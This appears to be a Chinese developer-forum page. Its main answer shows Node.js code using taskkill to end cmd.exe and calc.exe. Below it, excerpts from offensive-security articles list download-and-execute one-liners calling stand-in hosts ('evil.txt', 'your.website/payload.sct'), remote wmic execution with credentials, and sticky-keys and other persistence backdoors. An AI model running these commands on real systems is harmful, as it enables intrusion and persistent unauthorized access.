开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

用javascript停止cmd.exe或calc.exe进程(Windows进程)

要用JavaScript停止Windows进程，可以使用Node.js的child_process模块来执行系统命令。以下是一个示例代码：

const { exec } = require('child_process');

// 停止cmd.exe进程
exec('taskkill /F /IM cmd.exe', (error, stdout, stderr) => {
  if (error) {
    console.error(`停止cmd.exe进程失败：${error.message}`);
    return;
  }
  console.log('cmd.exe进程已停止');
});

// 停止calc.exe进程
exec('taskkill /F /IM calc.exe', (error, stdout, stderr) => {
  if (error) {
    console.error(`停止calc.exe进程失败：${error.message}`);
    return;
  }
  console.log('calc.exe进程已停止');
});

这段代码使用taskkill命令来停止指定的进程。/F参数表示强制终止进程，/IM参数后面跟着进程的可执行文件名。

请注意，执行系统命令可能存在安全风险，应谨慎使用。确保只停止自己有权限操作的进程，并对用户输入进行严格的验证和过滤，以防止命令注入等安全问题。

关于JavaScript停止Windows进程的更多信息，可以参考以下链接：

相关搜索:如何避免Windows cmd批处理进程被子进程停止？从javascript通过端口停止进程如何杀死在windows后台运行的特定cmd.exe进程？Access用vba停止excel的后台进程 windows服务器进程已停止工作用C -programming在windows下从进程id中获取进程名 `getOrElse`停止进程或返回不同的类类型使用ptrace停止或终止进程中的线程？windows服务器主进程已停止工作如何在Windows和Linux上停止执行子进程如何在windows下用PHP运行后台进程？在JavaScript (Node.js)中启动/停止后台工作进程 Git for windows在进程内“验证捆绑包”后停止工作进程失败:派生C:\WINDOWS\system32\cmd.exe ENOENT Jest进程“watch-test”意外结束，WSL2和jest扩展如何使systemd终止或停止重新生成rsyslog守护进程停止-进程不接受-id或来自管道值的输入 vscode调试器-无法停止或查看调用satck - flask的进程如何创建在进程退出或停止时运行的Java重启任务？您可以停止或增加Prefect的Lazarus进程的时间间隔吗？Windows或Linux Android Studio上的ndkBuild进程‘命令'sh’失败

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

用Python杀掉windows平台下的进程

给这个程序设置一个timeout 假如一段时间程序还没有返回，就杀掉这个这个新开的进程。"

8993 0

免杀技巧-执行系统命令方式总结

语法须知：默认搜索掩码为*，也使用参数 / p和/ m在Windows目录System32 和掩码calc.exe 上执行搜索，/ c参数之后的所有内容都是实际执行的命令。...命令： forfiles /p c:\windows\system32 /m calc.exe /c C:\tmp\hacker.exe ? Msf开启会话： ?...毫无疑问的是，Hacker.exe 将是forfiles.exe子进程。当然也可以用windows自带的“运行”来执行命令。...Pcalua：进程兼容性助手是Windows实用程序，当它检测到存在兼容性问题的软件时就会运行。...执行的有效负载将在系统上创建一个进程，该进程将把explorer.exe作为父进程。

1.6K4 0

进攻性横向移动

访问令牌：根据 Microsoft 的文档：访问令牌是描述进程或线程的安全上下文的令牌中的信息包括与进程或线程关联的用户帐户的身份和权限。...这可以通过 Powershell 中的命令完成，也可以通过 WMI 和 Powershell 远程完成：启用-PSRemoting -Force 从非 CS 的角度来看（用您的二进制文件替换 calc.exe...cmd.exe。...可以通过 UNC WebDAV 路径甚至通过 JavaScript 指定 DLL rundll32.exe javascript:".....\Temp\test.hta” ieframe.dll：可以运行.url文件 .url 文件示例： [互联网快捷方式] URL=file:///c:\windows\system32\cmd.exe

2.2K1 0

OFFENSIVE LATERAL MOVEMENT 横向移动(译文)

代表该用户执行的每个进程都有此访问令牌的副本。换句话说，它包含您的身份并说明您可以在系统上使用或不能使用的功能。...这可以通过Powershell中的命令完成，也可以通过WMI和Powershell远程完成： Enable-PSRemoting -Force 从非CS的角度来看（用您的二进制文件替换calc.exe）...cmd.exe。...Rundll32.exe再次是受信任的Windows二进制文件，用于执行DLL文件。可以通过UNC WebDAV路径甚至通过JavaScript来指定DLL。...rundll32.exe javascript:"..

4.2K1 0

windows进程详解3

winmgmt.exe进程文件： winmgmt or winmgmt.exe进程名称： Windows Management Service描述： Windows Management Service...C++ Builder 是否为系统进程: 否 calc.exe 进程文件: calc or calc.exe 进程名称: Calculator 描述: Microsoft Windows计算器程序...是否为系统进程: 否 charmap.exe 进程文件: charmap or charmap.exe 进程名称: Windows Character Map 描述: Windows字符映射表用来帮助你寻找不常见的字符...是否为系统进程: 否 cmd.exe 进程文件: cmd or cmd.exe 进程名称: Windows Command Prompt 描述: Windows控制台程序。...不像旧的command.com，cmd.exe是一个32位的命令行使用在WinNT/2000/XP。是否为系统进程: 否

9162 0

Windows常见的持久化后门汇总

0x00:前言持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用...test cmd.exe "cmd.exe /c calc.exe" #设置任务完成时将运行的命令 bitsadmin /resume test #激活任务 ?...0x11:INF文件后门 INF文件或安装信息文件是Microsoft Windows用于安装软件和驱动程序的纯文本文件....我们可以用assoc命令显示或修改文件扩展名关联,我们可以看一下.txt文件和jpg文件的关联 ?...可以用ftype命令显示或修改用在文件扩展名关联中的文件类型 txtfile=C:\Windows\system32\calc.EXE %1 ? 举个栗子

2.4K3 0

沙盘Sandboxie命令行用法

Programs禁用强制程序程序启动沙盘程序可以根据一个可执行程序的绝对路径和相对路径，在沙盘中运行此程序： "C:\Program Files\Sandboxie\Start.exe" c:\windows...\system32\calc.exe "C:\Program Files\Sandboxie\Start.exe" calc.exe 两个特例：在沙盘中运行网页浏览器 "C:\Program Files...参数 /wait 用于等待程序运行完成，返回状态信息: "C:\Program Files\Sandboxie\Start.exe" /wait cmd.exe 请注意，Start.exe是一个Win32...程序列表显示在一个特定的沙盘中的所有正在运行的程序列表的系统进程ID号 "C:\Program Files\Sandboxie\Start.exe" /listpids "C:\Program Files...显示的输出格式是每行一个进程ID，例如: "C:\Program Files\Sandboxie\Start.exe" /listpids | more 3 3036 2136 384 注意，

6323 0

在windows下查看某个运行程序（或进程）的命令行参数

在windows下查看某个运行程序（或进程）的命令行参数使用下面的命令： wmic process get caption,commandline /value 如果想查询某一个进程的命令行参数，使用下列方式...： wmic process where caption=”svchost.exe” get caption,commandline /value 这样就可以得到进程的可执行文件位置等信息。

8K2 0

Windows 卡进程问题-请等待当前程序完成卸载或更改，轻松解决

如果已经等待一段时间了，还是这样，说不定就是卡进程了，我们把这个进程结束就好了。只要我们任务管理器，映像名称排序后找到这个dllhost.exe的进程，结束进程就好了。 ?

7011 0

WMI利用(横向移动)

"c:\windows\system32\calc.exe" "c:\calc" ###文件下载：将远程主机calc.exe下载到本地c:\calc.exe cscript wmihacker_0.6...."c:\calc" "c:\windows\system32\calc.exe" #获取半交互式shell cscript.exe wmihacker.vbs /shell 192.168.8.179...复制到远程主机c:\calc.exe cscript wmihacker_0.6.vbs /upload 192.168.8.179 administrator "win@123" "c:\windows...示例在Windows2008R2、Windows2012R2、Windows2016均测试成功。..." -ComputerName "192.168.8.179" -Credential $Cred 执行Powershell命令，成功创建运行cmd.exe，进程号为3192 3192进程对应的cmd.exe

2.9K1 0

WMIC使用浅析

Windows平台下最有用的命令行工具。...自Windows98开始，Windows操作系统都支持WMIC，WMIC是一系列工具集组成的。在用WMIC执行命令过程中，操作系统默认不会将WMIC的操作记录在日志中，因为在这个过程中不会产生日志。...:\ip.txt文件中 wmic /node:192.168.10.131 /user:administrator /password:x123456./@ process call create "cmd.exe...name="tlntsvr" set startmode="Auto" #运行telnet服务 wmic SERVICE where name="tlntsvr" call startservice #停止..." -Credential $Cred 命令执行完成后，会在目标系统中运行calc.exe程序，返回的PID为 752

2.1K1 0

域渗透-横向移动命令总结

方法如下： SCShell.exe 10.10.10.19 XblAuthManager "C:\Windows\System32\cmd.exe /c calc" hack-my.com Administrator...\system32> C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest: rdp-tcp#55 "...用PsExec进行远程操作需要具备以下条件： ①远程主机开启了Admin$共享； ②远程主机未开启防火墙或放行445端口。...$com.item().Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)...$com.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0) 0X06

2.3K1 0

Apache Tika命令注入漏洞挖掘

为了解决这个问题，我们可以用双引号包装我们想要执行的命令，Windows将忽略引号后附加的任何内容，只执行我们的注入的命令。...这是因为将一组字符串传递给Java中的进程构建器或runtime.exec的工作方式如下： ?...通常像cmd.exe或/bin/sh这样的shell解释的字符（例如＆，，|，`等）不会被ProcessBuilder解释并且将被忽略，因此您不能中断命令或添加任何将它作为单个字符串的参数。...这意味着我可以用一些代码或命令填充该文件并执行它。...现在我必须找到一个原生的Windows应用程序，它将忽略tika-server创建的所有随机杂散参数，并仍然执行第一个文件内容作为某种命令或代码，即使它具有“.tmp”扩展名。

1.6K2 0

红队技巧-常规横向手法

我们可以用sc对目标主机远程创建服务来进行横向渗透使用sc命令远程Windows服务操作需先建立IPC$连接，否则在执行时会返回拒绝访问。流程基本如下： 1....management instrumentation，它出现在所有的Windows操作系统中，并由一组强大的工具集合组成，用于管理本地或远程的Windows系统，攻击者使用wmi来进行攻击，但Windows...\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll...，通过它可以访问、配置、管理和监视几乎所有的Windows资源，比如用户可以在远程计算机器上启动一个进程；设定一个在特WMI允许脚本语言（例如VBScript或Windows PowerShell）在本地和远程管理...Microsoft Windows 个人计算机和服务器，支持账户密码或hash认证。

2.1K2 0

基础免杀手法暴风吸入

/windows/system32/calc.exe" cmd.exe /c "ping ;a.exe; 127.0.0.1/../../../../../../../../...../windows/system32/calc.exe conhost 大于win7可用 conhost c:\windows\system32\calc.exe conhost adsadas/../..../windows/system32/calc.exe 以下指令win10某些版本无法使用 conhost "asddas c:\windows\system32\calc.exe" explorer.exe...explorer.exe c:\windows\system32\calc.exe explorer asdsadasd,"c:\windows\system32\calc.exe" C++ shellcode...对于一个正常的用户来说，启动exe文件应该是双击运行，程序启动后父进程是explore.exe，如果是cmd运行则会是cmd.exe、但是对于沙箱就有可能存在用一个程序如windbg来启动我们的恶意

1.4K1 0

Apache中.htaccess文件利用的总结与新思路拓展

其实后者用的越来越广泛了。一般PHP-FPM也是与FastCGI进行配合使用的。可以参考CGI、FastCGI和PHP-FPM关系图解和Apache下PHP的几种工作方式来了解更多。...接下来，以Windows平台为例，上传poc.xx文件，内容如下： #!C:/Windows/System32/cmd.exe /c start calc.exe 1 第一行用来表示CGI程序的路径。...因为CGI程序处理完成后，会被Apache关闭，所以我们这里要用启动新进程的方式来启动。结果这时访问poc.xx。计算器就出来啦~~ 拿火绒剑来看下~ ?.../cmd.exe /c start cmd.exe" .abc 老样子，如果默认就开启了ExecCGI，则第一句可以省略。...PHP环境下使用 auto_prepend_file 或 auto_append_file 创建后门通过配置auto_append_file或auto_prepend_file可以向所有php文件中的开头或尾部插入指定的文件的内容

1.3K2 0

如何利用日志来监控和限制PowerShell攻击活动

观察PowerShell父进程和子进程之间的关系一般来说，当我们从开始菜单或磁盘目录中直接运行PowerShell的话，它会在explorer.exe进程下运行。...脚本或命令会通过命令行进程执行。...因此，在这种场景下，PowerShell.exe的父进程将会是cmd.exe：所以说，我们可以通过观察PowerShell父进程和子进程之间的关系来作为我们的IoC。...除此之外，如果cmd.exe是通过脚本来生成的，并且父进程是 winword.exe、mshta.exe、wscript.exe或wuapp.exe的话，那么脚本的内容就值得我们去仔细检查了。...因此，我们需要注意并记录以下PowerShell进程： -由 winword.exe生成的PowerShell进程（父进程是winword.exe） -由cmd.exe生成的PowerShell进程（父进程是

2.3K5 0

权限维持方法小结

目录下的iexplore.exe 添加一个Debugger字符串值(REG_SZ)，并且赋值为calc.exe的执行路径"c:\windows\system32\calc.exe" 运行iexplore.exe...下新建一个对象ID，就能够劫持某个进程或多个进程。...Management Instrumentation）即 Windows 管理规范，由一组强大的工具集合组成，用于管理本地或远程的 Windows 系统。...waitfor.exe 使用Process Explorer查看后台可疑的cmd.exe和powershell.exe进程的启动参数（3）bitsadmin bitsadmin.exe是windows...copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y copy c:\windows\system32\sethc.exe

3.4K1 0

横向移动

://github.com/gentilkiwi/mimikatz Mimikatz可以从lsass.exe 进程里获取windows处于active状态账号的明文密码。...\Get-PassHashes.ps1 Get-PassHashes Windows远程连接和相关命令 IPC IPC(Internet Process Connection)共享命名管道的资源，是为了时间进程间通信而开放的命名管道...dir \\192.168.10.1\c$ //列出DC上C盘的文件 tasklist命令 tasklist显示本地或远程机器上当前运行的进程列表。...Management Instrumentation，135端口)是Windows自带功能,WMI以本地和远程方式提供了许多管理功能，包括查询系统信息、启动和停止进程以及设置条件触发器，而且整个运行过程都在计算机内存中发生...PTH(Pass The Hash) PTH在内网中是一种经典的攻击方式，可直接通过LM Hash(已弃用)和NTLM Hash访问远程主机或服务。

2.3K6 0

Windows文件下载执行的15种姿势

net.webclient).downloadstring('http://192.168.28.128/imag/evil.txt'))" 2、Bitsadmin bitsadmin是一个命令行工具，可用于创建下载或上传工作和监测其进展情况..." http://192.168.28.128/imag/evil.txt 5、ipc$文件共享 IPC$(Internet Process Connection)是共享”命名管道”的资源，它是为了让进程间通信而开放的命名管道...复制代码如下： rundll32.exe javascript:"\.....[CDATA[ ps = "cmd.exe /c calc.exe"; new ActiveXObject("WScript.Shell").Run(ps...14、MSXSL.EXE msxsl.exe是微软用于命令行下处理XSL的一个程序，所以通过他，我们可以执行JavaScript进而执行系统命令。

3.9K1 1

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭